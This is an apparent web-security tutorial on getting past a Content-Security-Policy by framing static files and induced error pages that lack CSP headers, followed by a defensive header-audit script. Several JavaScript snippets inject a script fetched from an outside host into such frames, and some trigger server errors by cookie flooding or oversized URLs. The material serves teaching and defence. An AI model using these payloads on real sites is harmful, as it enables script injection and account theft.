A configuration such as:

```
Content-Security-Policy: default-src 'self' 'unsafe-inline';
```

forbids the use of any function that executes code passed to it as a string. For example, the string-argument forms of eval, setTimeout and setInterval will all be blocked because the policy does not include 'unsafe-eval'.
Any content from external sources is also blocked, including images, CSS, WebSockets and, in particular, JS.
Via Text & Images

It has been observed that modern browsers wrap images and text files in an HTML document to improve how they are displayed (for example, adding a background, centering the content, and so on). Therefore, if an image or text file such as favicon.ico or robots.txt is opened inside an iframe, it is rendered as HTML. Notably, these responses often lack CSP headers and may also lack X-Frame-Options, which allows arbitrary JavaScript to be executed from within them:

```javascript
frame = document.createElement("iframe")
frame.src = "/css/bootstrap.min.css"
document.body.appendChild(frame)
script = document.createElement("script")
script.src = "//example.com/csp.js"
window.frames[0].document.head.appendChild(script)
```
Via Errors

Similarly, error responses, like text files or images, are typically served without CSP headers and may lack X-Frame-Options. Errors can be induced so that the error page loads inside an iframe, enabling the following actions:

```javascript
// Inducing an nginx error
frame = document.createElement("iframe")
frame.src = "/%2e%2e%2f"
document.body.appendChild(frame)

// Triggering an error with a long URL
frame = document.createElement("iframe")
frame.src = "/" + "A".repeat(20000)
document.body.appendChild(frame)

// Generating an error via extensive cookies
for (var i = 0; i < 5; i++) {
  document.cookie = i + "=" + "a".repeat(4000)
}
frame = document.createElement("iframe")
frame.src = "/"
document.body.appendChild(frame)
// Removal of cookies is crucial post-execution
for (var i = 0; i < 5; i++) {
  document.cookie = i + "="
}
```

After triggering one of the scenarios above, JavaScript execution inside the iframe can be achieved as follows:

```javascript
script = document.createElement("script")
script.src = "//example.com/csp.js"
window.frames[0].document.head.appendChild(script)
```
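As an added defender-side example (not code from the original page), the audit below checks a set of captured HTTP responses for the gap both sections above depend on: static files and error pages served without a CSP. Because a same-origin page can always frame a sibling resource, the control that matters is a CSP with a script directive on every response; frame-ancestors and X-Frame-Options only stop cross-origin framing. The paths, status codes and headers below are constructed samples.

```javascript
// Added example: audit captured responses for missing CSP / framing headers.
// Finding codes: "no-csp", "csp-without-script-directive",
// "no-framing-restriction", "error-page-without-csp".
// Header names are matched case-insensitively; sample data is constructed.

function parseCsp(value) {
  // "default-src 'self'; frame-ancestors 'self'" -> { "default-src": [...], ... }
  const directives = {};
  for (const part of value.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length > 0) directives[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return directives;
}

function getHeader(headers, name) {
  const key = Object.keys(headers).find((k) => k.toLowerCase() === name);
  return key === undefined ? null : headers[key];
}

// Audit one response of the form { path, status, headers }.
function auditResponse(resp) {
  const findings = [];
  const cspValue = getHeader(resp.headers, "content-security-policy");
  const csp = cspValue === null ? {} : parseCsp(cspValue);
  if (cspValue === null) {
    findings.push("no-csp"); // scripts injected by a same-origin framer run unrestricted
  } else if (!("script-src" in csp) && !("default-src" in csp)) {
    findings.push("csp-without-script-directive");
  }
  if (getHeader(resp.headers, "x-frame-options") === null && !("frame-ancestors" in csp)) {
    findings.push("no-framing-restriction");
  }
  if (resp.status >= 400 && cspValue === null) findings.push("error-page-without-csp");
  return findings;
}

function auditAll(responses) {
  return Object.fromEntries(responses.map((r) => [r.path, auditResponse(r)]));
}

// Constructed sample: only "/" carries a full policy; the rest mirror the text.
const SAMPLE_RESPONSES = [
  { path: "/", status: 200, headers: { "Content-Security-Policy": "default-src 'self' 'unsafe-inline'; frame-ancestors 'self'" } },
  { path: "/favicon.ico", status: 200, headers: { "Content-Type": "image/x-icon" } },
  { path: "/robots.txt", status: 200, headers: { "X-Frame-Options": "SAMEORIGIN" } },
  { path: "/css/bootstrap.min.css", status: 200, headers: { "Content-Security-Policy": "frame-ancestors 'self'" } },
  { path: "/%2e%2e%2f", status: 400, headers: {} },
];

console.log(JSON.stringify(auditAll(SAMPLE_RESPONSES), null, 2));
```

Every path other than "/" is reported, including /robots.txt, whose X-Frame-Options: SAMEORIGIN does nothing against a same-origin framer.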